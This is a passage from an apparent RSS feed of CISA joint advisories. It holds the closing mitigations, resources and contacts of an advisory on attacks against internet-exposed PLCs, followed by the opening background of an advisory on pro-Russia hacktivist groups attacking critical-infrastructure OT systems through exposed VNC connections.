&lt;li&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&lt;/strong&gt;&amp;nbsp;&lt;/em&gt;&lt;strong&gt;Take defensive measures to minimize the risk of exploitation.&amp;nbsp;&lt;/strong&gt;Conduct comprehensive impact analysis and risk assessments prior to deploying defensive measures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Create and test strong backups of the logic and configurations of PLCs&lt;/strong&gt;. Store backup files offline and secure the physical removal media to enable fast recovery.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement multifactor authentication&lt;/strong&gt; &lt;strong&gt;(MFA)&lt;/strong&gt; [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementMultifactorAuthentication3F&quot; title=&quot;CPG 3.F&quot;&gt;CPG 3.F&lt;/a&gt;] for access to the OT network from an external network.&lt;/li&gt;
&lt;li&gt;If remote access is required, &lt;strong&gt;implement a network proxy, gateway, firewall, and/or VPN in front of the PLC to control network access&lt;/strong&gt;.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;A VPN or gateway device can enable MFA for remote access even if the PLC does not support MFA. Implement security rules on these higher-level network security mechanisms to prevent the type of repeated and sustained login attempts seen during a brute force attack. When possible, implement a device control list for workstations sending messages or connecting to OT components.&lt;/li&gt;
&lt;li&gt;Use the device control list to monitor for logon activity for unexpected or unusual access to devices from the internet.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Keep PLC devices updated with the latest software patches issued by the manufacturer.&lt;/strong&gt; Use established downtime windows to install patches. &lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot; title=&quot;Known Exploited Vulnerabilities&quot;&gt;Known Exploited Vulnerabilities&lt;/a&gt; may need to be prioritized outside a downtime window.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure external and internal firewalls to block traffic using common ports&amp;nbsp;&lt;/strong&gt;associated with network protocols that are unnecessary for the particular network segment.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Disable any unused authentication methods, logic, or features,&amp;nbsp;&lt;/strong&gt;such as default authentication keys and passwords, as well as unused or needed services such as Teletype Network (Telnet), File Transfer Protocol (FTP), Remote Desktop Protocol (RDP), Virtual Network Computing (VNC), and web services.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitor asset management systems for device configuration changes&lt;/strong&gt;, which can be used to understand expected parameter settings.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitor the content of network traffic&lt;/strong&gt; for the following:&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Unusual logins to internet-connected devices or unexpected protocols to/from the internet.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Functions of industrial control systems management protocols that change an asset’s operating mode or modify programs.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&lt;/strong&gt;&amp;nbsp;&lt;/em&gt;&lt;strong&gt;Ensure service providers are informed of active threats targeting internet-connected PLC devices.&amp;nbsp;&lt;/strong&gt;Owners and operators should communicate directly with service providers to address risks, especially when remote monitoring or maintenance is involved. Some service providers may rely on internet connectivity essential to monitor and maintain OT/ICS operations but may not be fully aware of active threats.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In addition, the authoring agencies recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, as well as reduce the impact and risk of compromise by cyber threat actors:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Reduce risk exposure&lt;/strong&gt;. CISA offers a range of services at no cost, including scanning and testing, to help organizations reduce exposure to threats via mitigating attack vectors. CISA’s &lt;a href=&quot;https://www.cisa.gov/cyber-hygiene-services&quot; title=&quot;Cyber Hygiene Services&quot;&gt;Cyber Hygiene Services&lt;/a&gt; can help provide additional review of organizations’ internet-accessible assets.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Device Manufacturers&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The following guidance is general in nature and not specific to any OT vendor. Some of the features, settings, and practices may already be offered by certain vendors. The inclusion of this guidance should not be interpreted as an assertion that vendors referenced do not offer such security features. Also, this advisory is not highlighting a new vulnerability in the identified products, but instead discusses opportunistic targeting. Device manufacturers can make opportunistic attacks more difficult at scale by encouraging more secure behavior by default and in operations, as discussed below.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Although critical infrastructure organizations using PLC devices can take steps to mitigate the risks, it is ultimately the responsibility of the device manufacturer to build products secured by design and default. The authoring agencies urge device manufacturers to take ownership of their customers’ security outcomes by following the principles in the joint guide &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting&quot; title=&quot;Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products&quot;&gt;Secure by Demand: Priority Considerations for OT Owners and Operators when Selecting Digital Products&lt;/a&gt;, primarily:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Change the manufacturers’ default settings to prevent exposing administrative interfaces to the internet.&lt;/li&gt;
&lt;li&gt;Do not charge additional fees for basic security features needed to operate the product securely.&lt;/li&gt;
&lt;li&gt;Support MFA, including via phishing-resistant methods.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By using secure by design tactics, software manufacturers can make product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.&lt;/p&gt;
&lt;p&gt;For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory &lt;a href=&quot;https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a&quot; title=&quot;NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations&quot;&gt;NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations&lt;/a&gt;. For more information on secure by design, see CISA’s &lt;a href=&quot;https://www.cisa.gov/securebydesign&quot; title=&quot;Secure by Design&quot;&gt;Secure by Design&lt;/a&gt; webpage and joint guide.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Validate Security Controls&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization&#039;s security program against the threat behaviors mapped to the MITRE ATT&amp;amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;amp;CK techniques described in this advisory.&lt;/p&gt;
&lt;p&gt;To get started:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Select an ATT&amp;amp;CK technique described in this advisory (see&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;a href=&quot;#Table3&quot;&gt;&lt;strong&gt;Table 3&lt;/strong&gt;&lt;/a&gt; to&amp;nbsp;&lt;a href=&quot;#Table6&quot;&gt;&lt;strong&gt;Table 6&lt;/strong&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;Align your security technologies against the technique.&lt;/li&gt;
&lt;li&gt;Test your technologies against the technique.&lt;/li&gt;
&lt;li&gt;Analyze your detection and prevention technologies’ performance.&lt;/li&gt;
&lt;li&gt;Repeat the process for all security technologies to obtain a set of comprehensive performance data.&lt;/li&gt;
&lt;li&gt;Tune your security program, including people, processes, and technologies, based on the data generated by this process.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the ATT&amp;amp;CK techniques identified in this advisory.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Resources&lt;/strong&gt;&lt;/h2&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Authoring Agencies: &lt;a href=&quot;https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a&quot; title=&quot;IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities&quot;&gt;IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA: &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/bulletproof-defense-mitigating-risks-bulletproof-hosting-providers&quot; title=&quot;Bulletproof Defense: Mitigating Risks From Bulletproof Hosting Providers&quot;&gt;Bulletproof Defense: Mitigating Risks From Bulletproof Hosting Providers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;EPA: &lt;a href=&quot;https://www.epa.gov/cyberwater/epa-cybersecurity-water-sector&quot; target=&quot;_blank&quot; title=&quot;Cybersecurity for the Water Sector&quot;&gt;Cybersecurity for the Water Sector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA: &lt;a href=&quot;https://www.cisa.gov/water&quot; title=&quot;Water and Wastewater Cybersecurity&quot;&gt;Water and Wastewater Cybersecurity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA: &lt;a href=&quot;https://www.cisa.gov/news-events/alerts/2023/11/28/exploitation-unitronics-plcs-used-water-and-wastewater-systems&quot; title=&quot;Exploitation of Unitronics PLCs used in Water and Wastewater Systems&quot;&gt;Exploitation of Unitronics PLCs used in Water and Wastewater Systems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA: &lt;a href=&quot;https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/iran&quot; title=&quot;Iran Cyber Threat Overview and Advisories&quot;&gt;Iran Threat Overview and Advisories&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;FBI: &lt;a href=&quot;https://www.fbi.gov/investigate/counterintelligence/the-iran-threat&quot; target=&quot;_blank&quot; title=&quot;The Iran Threat&quot;&gt;The Iran Threat&lt;/a&gt; and &lt;a href=&quot;https://www.fbi.gov/investigate/cyber/cyber-threat-overview-iran&quot; target=&quot;_blank&quot; title=&quot;Cyber Threat Overview: Iran&quot;&gt;Cyber Threat Overview: Iran&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA, MITRE: &lt;a href=&quot;https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping&quot; title=&quot;Best Practices for MITRE ATT&amp;amp;CK Mapping&quot;&gt;Best Practices for MITRE ATT&amp;amp;CK Mapping&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA: &lt;a href=&quot;https://github.com/cisagov/Decider/&quot; title=&quot;Decider Tool&quot;&gt;Decider Tool&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA: &lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0&quot; title=&quot;Cross-Sector Cybersecurity Performance Goals 2.0&quot;&gt;Cross-Sector Cybersecurity Performance Goals 2.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA: &lt;a href=&quot;https://www.cisa.gov/topics/cyber-threats-and-advisories/cyber-hygiene-services&quot; title=&quot;No-Cost Cybersecurity Services and Tools&quot;&gt;No-Cost Cybersecurity Services and Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA: &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting&quot; title=&quot;Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products&quot;&gt;Secure by Demand: Priority Considerations for OT Owners and Operators when Selecting Digital Products&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;NSA, CISA: &lt;a href=&quot;https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a&quot; title=&quot;NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations&quot;&gt;NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CISA: &lt;a href=&quot;https://www.cisa.gov/securebydesign&quot; title=&quot;Secure by Design&quot;&gt;Secure by Design&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;FBI, CISA: &lt;a href=&quot;https://www.ic3.gov/CSA/2025/250506.pdf&quot; target=&quot;_blank&quot; title=&quot;Primary Mitigations to Reduce Cyber Threats to Operational Technology&quot;&gt;Primary Mitigations to Reduce Cyber Threats to Operational Technology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;United Kingdom National Cyber Security Centre: &lt;a href=&quot;https://www.ic3.gov/CSA/2026/260114.pdf&quot; target=&quot;_blank&quot; title=&quot;Secure Connectivity Principles for Operational Technology (OT)&quot;&gt;Secure connectivity principles for operational technology&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Contact&quot;&gt;&lt;strong&gt;Contact Information&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, the FBI, and/or NSA:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Contact CISA via CISA’s 24/7 Operations Center at &lt;a href=&quot;mailto:contact@cisa.dhs.gov&quot;&gt;contact@cisa.dhs.gov&lt;/a&gt; or 1-844-Say-CISA (1-844-729-2472). File a claim with FBI’s &lt;a href=&quot;https://ic3.gov/&quot; target=&quot;_blank&quot; title=&quot;Internet Crime Complaint Center (IC3)&quot;&gt;Internet Crime Complaint Center (IC3)&lt;/a&gt; or contact your local &lt;a href=&quot;https://www.fbi.gov/contact-us/field-offices&quot; target=&quot;_blank&quot; title=&quot;FBI field office&quot;&gt;FBI field office&lt;/a&gt;. When available, please include the following information regarding the incident:&amp;nbsp;
&lt;ul&gt;
&lt;li&gt;Date, time, and location of the incident;&lt;/li&gt;
&lt;li&gt;Type of activity;&lt;/li&gt;
&lt;li&gt;Number of people affected;&lt;/li&gt;
&lt;li&gt;Type of equipment used for the activity; and&lt;/li&gt;
&lt;li&gt;Name of the submitting company or organization, and a designated point of contact.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;For NSA cybersecurity guidance inquiries, contact &lt;a href=&quot;mailto:CybersecurityReports@nsa.gov&quot; title=&quot;CybersecurityReports@nsa.gov&quot;&gt;CybersecurityReports@nsa.gov&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For other energy sector inquiries, contact &lt;a href=&quot;mailto:EnergySRMA@hq.doe.gov&quot; title=&quot;EnergySRMA@hq.doe.gov&quot;&gt;EnergySRMA@hq.doe.gov&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Contact the Rockwell Automation PSIRT for questions regarding their guidance or for reporting cyber incidents related to Rockwell Automation products at &lt;a href=&quot;mailto:PSIRT@rockwellautomation.com&quot; title=&quot;PSIRT@rockwellautomation.com&quot;&gt;PSIRT@rockwellautomation.com&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Contact the Schneider Electric CPCERT at &lt;a href=&quot;mailto:cpcert@se.com&quot;&gt;cpcert@se.com&lt;/a&gt; for questions regarding this guidance, or to report cyber incidents related to Schneider Electric products.&lt;/li&gt;
&lt;li&gt;Contact Siemens ProductCERT for up-to-date information about the security of Siemens products or to report cybersecurity vulnerabilities at &lt;a href=&quot;mailto:productcert@siemens.com&quot;&gt;productcert@siemens.com&lt;/a&gt;. For support with increasing the security of installed Siemens PLCs, contact Siemens Industrial Cybersecurity Services at &lt;a href=&quot;mailto:services.automation@siemens.com&quot;&gt;services.automation@siemens.com&lt;/a&gt;. See &lt;a href=&quot;https://www.siemens.com/en-us/content/cert-services/&quot; target=&quot;_blank&quot; title=&quot;Siemens ProductCERT and Siemens CERT&quot;&gt;Siemens ProductCERT and Siemens CERT&lt;/a&gt; for more information.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Disclaimer&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Version History&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;April 7, 2026&lt;/strong&gt;: Initial version.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;July 22, 2026&lt;/strong&gt;: Update includes new guidance on detecting malicious activity, expanded scope of observed targeting, and best practices for secure PLCs deployment.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Notes&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note1&quot;&gt;&lt;/a&gt;&lt;sup&gt;1&lt;/sup&gt;Project file refers to the software file that contains ladder logic and configuration settings. On Rockwell Automation devices, it is referred to as an .ACD file.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note2&quot;&gt;&lt;/a&gt;&lt;sup&gt;2 &lt;/sup&gt;See &lt;a href=&quot;https://literature.rockwellautomation.com/idc/groups/literature/documents/um/1769-um021_-en-p.pdf&quot; target=&quot;_blank&quot; title=&quot;CompactLogix 5370 Controllers&quot;&gt;CompactLogix 5370 Controllers&lt;/a&gt; (Chapter 5: “Select the Operating Mode of the Controller”) for more information on functions available for the switch.&lt;/p&gt;
</description>
  <pubDate>Mon, 06 Apr 2026 07:03:58 EDT</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/24709</guid>
    </item>
<item>
  <title>Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-343a</link>
  <description>&lt;h2&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology&quot; title=&quot;Primary Mitigations to Reduce Cyber Threats to Operational Technology&quot;&gt;Primary Mitigations to Reduce Cyber Threats to Operational Technology&lt;/a&gt; and European Cybercrime Centre’s (EC3) &lt;a href=&quot;https://www.europol.europa.eu/media-press/newsroom/news/global-operation-targets-noname05716-pro-russian-cybercrime-network&quot; target=&quot;_blank&quot; title=&quot;Operation Eastwood&quot; data-entity-type=&quot;external&quot;&gt;Operation Eastwood&lt;/a&gt;, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental Protection Agency (EPA), and EC3 shared information about cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States and globally.&lt;/p&gt;
&lt;p&gt;FBI, CISA, National Security Agency (NSA), and the following partners—hereafter referred to as “the authoring organizations”—are releasing this joint advisory on the targeting of critical infrastructure by pro-Russia hacktivists:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;U.S. Department of Energy (DOE)&lt;/li&gt;
&lt;li&gt;U.S. Environmental Protection Agency (EPA)&lt;/li&gt;
&lt;li&gt;U.S. Department of Defense Cyber Crime Center (DC3)&lt;/li&gt;
&lt;li&gt;Europol European Cybercrime Centre (EC3)&lt;/li&gt;
&lt;li&gt;EUROJUST – European Union Agency for Criminal Justice Cooperation&lt;/li&gt;
&lt;li&gt;Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)&lt;/li&gt;
&lt;li&gt;Canadian Centre for Cyber Security (Cyber Centre)&lt;/li&gt;
&lt;li&gt;Canadian Security Intelligence Service (CSIS)&lt;/li&gt;
&lt;li&gt;Czech Republic Military Intelligence (VZ)&lt;/li&gt;
&lt;li&gt;Czech Republic National Cyber and Information Security Agency (NÚKIB)&lt;/li&gt;
&lt;li&gt;Czech Republic National Centre Against Terrorism, Extremism, and Cyber Crime (NCTEKK)&lt;/li&gt;
&lt;li&gt;French National Cybercrime Unit – Gendarmerie Nationale (UNC)&lt;/li&gt;
&lt;li&gt;French National Jurisdiction for the Fight Against Organized Crime (JUNALCO)&lt;/li&gt;
&lt;li&gt;German Federal Office for Information Security (BSI)&lt;/li&gt;
&lt;li&gt;Italian State Police (PS)&lt;/li&gt;
&lt;li&gt;Latvian State Police (VP)&lt;/li&gt;
&lt;li&gt;Lithuanian Criminal Police Bureau (LKPB)&lt;/li&gt;
&lt;li&gt;New Zealand National Cyber Security Centre (NCSC-NZ)&lt;/li&gt;
&lt;li&gt;Romanian National Police (PR)&lt;/li&gt;
&lt;li&gt;Spanish Civil Guard (GC)&lt;/li&gt;
&lt;li&gt;Spanish National Police (CNP)&lt;/li&gt;
&lt;li&gt;Swedish Polisen (SC3)&lt;/li&gt;
&lt;li&gt;United Kingdom National Cyber Security Centre (NCSC-UK)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The authoring organizations assess pro-Russia hacktivist groups are conducting less sophisticated, lower-impact attacks against critical infrastructure entities, compared to advanced persistent threat (APT) groups. These attacks use minimally secured, internet-facing virtual network computing (VNC) connections to infiltrate (or gain access to) OT control devices within critical infrastructure systems. Pro-Russia hacktivist groups—Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), Sector16, and affiliated groups—are capitalizing on the widespread prevalence of accessible VNC devices to execute attacks against critical infrastructure entities, resulting in varying degrees of impact, including physical damage. Targeted sectors include &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector&quot; title=&quot;Water and Wastewater Systems&quot;&gt;Water and Wastewater Systems&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector&quot; title=&quot;Food and Agriculture Sector&quot;&gt;Food and Agriculture&lt;/a&gt;, and &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector&quot; title=&quot;Energy Sector&quot;&gt;Energy&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The authoring organizations encourage critical infrastructure organizations to implement the recommendations in the &lt;a href=&quot;#Mitigations&quot; title=&quot;Mitigations&quot;&gt;&lt;strong&gt;Mitigations &lt;/strong&gt;&lt;/a&gt;section of this advisory to reduce the likelihood and impact of pro-Russia hacktivist-related incidents. For additional information on Russian state-sponsored malicious cyber activity, see CISA’s &lt;a href=&quot;https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/russia&quot; title=&quot;Russia Threat Overview and Advisories&quot;&gt;Russia Threat Overview and Advisories&lt;/a&gt; webpage.&lt;/p&gt;
&lt;p&gt;Download the PDF version of this report:&lt;/p&gt;





&lt;div class=&quot;c-file&quot;&gt;
    &lt;div class=&quot;c-file__download&quot;&gt;
    &lt;a href=&quot;/sites/default/files/2026-08/aa25-343a-pro-russia-hacktivists-conduct-attacks_0.pdf&quot; class=&quot;c-file__link&quot; target=&quot;_blank&quot;&gt;AA25 343A Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure&lt;/a&gt;
    &lt;span class=&quot;c-file__size&quot;&gt;(PDF,       1.70 MB
  )&lt;/span&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Background and Development of Pro-Russia Hacktivist Groups&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Over the past several years, the authoring organizations have observed pro-Russia hacktivist groups conducting cyber operations against numerous organizations and critical infrastructure sectors worldwide. The escalation of the Russia-Ukraine conflict in 2022 significantly increased the number of these pro-Russia groups. Consisting of individuals who support Russia’s agenda but lack direct governmental ties, most of these groups target Ukrainian and allied infrastructure. However, among the increasing number of groups, some appear to have associations with the Russian state through direct or indirect support.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Cyber Army of Russia Reborn&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The authoring organizations assess that the Russian General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455—tracked in the cybersecurity community under several names (see&lt;strong&gt; &lt;/strong&gt;&lt;a href=&quot;#AppB&quot; title=&quot;Appendix B&quot;&gt;&lt;strong&gt;Appendix B: Additional Designators Used for Cited Groups&lt;/strong&gt;&lt;/a&gt;)—is likely responsible for supporting the creation of CARR —also known as “The People’s Cyber Army of Russia”—in late February or early March of 2022. Actors suspected to be from GRU unit 74455 likely funded the tools CARR threat actors used to conduct distributed denial-of-service (DDoS) attacks through at least September 2024.&lt;/p&gt;
&lt;p&gt;In April 2022, the group began using a new Telegram channel featuring the name “CyberArmyofRussia_Reborn” to organize and plan group actions. The channel creators recruited actors to use CARR as an unattributable platform for conducting cyber activities beneath the level of an APT, aimed at deterring anti-Russia rhetoric. CARR threat actors presented themselves as a group of pro-Russia hacktivists supporting Russia’s stance on the Ukrainian conflict, and they soon began claiming responsibility for DDoS attacks against the U.S. and Europe for supporting Ukraine.&lt;/p&gt;
&lt;p&gt;CARR documented these actions through embellished images and videos shared on their social media channels, promoting Russian ideology, disseminating talking points, and publicizing leaked information from hacks attributed to Russian state threat actors.&lt;/p&gt;
&lt;p&gt;In late 2023, CARR expanded their operations to include attacks on industrial control systems (ICS), claiming an intrusion against a European wastewater treatment facility in October 2023. In November 2023, CARR targeted human-machine interface (HMI) devices, claiming intrusions at two U.S. dairy farms.&lt;/p&gt;
&lt;p&gt;The authoring organizations assess that by late September 2024, CARR channel administrators became dissatisfied with the level of support and funding provided by the GRU. This dissatisfaction led CARR administrators and an administrator from another hacktivist group, NoName057(16), to create the Z-Pentest group, employing the same tactics, techniques, and procedures (TTPs) as CARR but separate from GRU involvement.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;NoName057(16)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The authoring organizations assess that the Center for the Study and Network Monitoring of the Youth Environment (CISM), established on behalf of the Kremlin, created NoName057(16) as a covert project within the organization. Senior executives and employees within CISM developed and customized the NoName057(16) proprietary DDoS tool &lt;code&gt;DDoSia&lt;/code&gt;, paid for the group’s network infrastructure, served as administrators on NoName057(16) Telegram channels, and selected DDoS targets.&lt;/p&gt;
&lt;p&gt;Active since March 2022, NoName057(16) has conducted frequent DDoS attacks against government and private sector entities in North Atlantic Treaty Organization (NATO) member states and other European countries perceived as hostile to Russian geopolitical interests. The group operates primarily through Telegram channels and used GitHub, alongside various websites and repositories, to host &lt;code&gt;DDoSia&lt;/code&gt; and share materials and TTPs with their followers.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;In 2024, NoName057(16) began collaborating closely with other pro-Russia hacktivist groups, operating a joint chat with CARR by mid-2024. In July 2024, NoName057(16) jointly claimed responsibility with CARR for an alleged intrusion against OT assets in the U.S. The high degree of cooperation with CARR likely contributed to the formation of Z-Pentest, which is composed of actors and administrators from both teams, in September 2024.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Z-Pentest&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Established in September 2024, Z-Pentest is composed of members from CARR and NoName057(16). The group specializes in OT intrusion operations targeting globally dispersed critical infrastructure entities. Additionally, the group uses “hack and leak” operations and defacement attacks to draw attention to their pro-Russia messaging. Unlike other pro-Russia hacktivist groups, Z-Pentest largely avoids DDoS activities, claiming OT intrusions as attempts to garner more attention from the media.&lt;/p&gt;
&lt;p&gt;Shortly after Z-Pentest’s inception, the group announced alliances with CARR and NoName057(16), possibly to leverage the other groups’ subscribers to grow the new channel. In March 2025, Z-Pentest posted evidence claiming OT device intrusions to their channel using a NoName057(16) cyberattack campaign hashtag. Similarly, in April 2025, Z-Pentest shared a video purporting defacement of an HMI by changing system names to NoName057(16) and CARR references. Z-Pentest continues to create new alliances with other groups, like Sector16, to continue growing their subscriber base and incidentally propagate TTPs with new partners.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Sector16&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Formed in January 2025, Sector16 is a novice pro-Russia hacktivist group that emerged through collaboration with Z-Pentest. Sector16 actively maintains an online presence, including a public Telegram channel where they share videos, statements, and claims of compromising U.S. energy infrastructure. These communications often align with pro-Russia narratives and reflect their self-proclaimed support for Russian geopolitical objectives.&lt;/p&gt;
&lt;p&gt;Members of Sector16 may have received indirect support from the Russian government in exchange for conducting specific cyber operations that further Russian strategic goals. This aligns with broader Russian cyber strategies that involve leveraging non-state threat actors for certain cyber activities, adding a layer of deniability.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Technical Details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This advisory uses the MITRE ATT&amp;amp;CK&lt;sup&gt;®&lt;/sup&gt; &lt;a href=&quot;https://attack.mitre.org/versions/v18/matrices/enterprise/&quot; title=&quot;Matrix for Enterprise framework&quot; data-entity-type=&quot;external&quot;&gt;Matrix for Enterprise framework&lt;/a&gt;, version 18.&amp;nbsp;See the &lt;a href=&quot;#MITRE&quot; title=&quot;MITRE ATT&amp;amp;CK Tactics and Techniques&quot;&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/a&gt; section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;amp;CK tactics and techniques.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;TTP Overview&lt;/strong&gt;&lt;/h3&gt;
